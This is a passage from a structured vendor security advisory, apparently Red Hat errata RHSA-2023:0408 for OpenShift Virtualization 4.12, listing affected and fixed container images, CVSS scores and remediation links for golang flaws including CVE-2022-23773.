"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", }, { cve: "CVE-2022-23773", cwe: { id: "CWE-1220", name: "Insufficient Granularity of Access Control", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053541", }, ], notes: [ { category: "description", text: "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", title: "Vulnerability description", }, { category: "summary", text: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23773", }, { category: "external", summary: "RHBZ#2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23773", url: "https://www.cve.org/CVERecord?id=CVE-2022-23773", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", 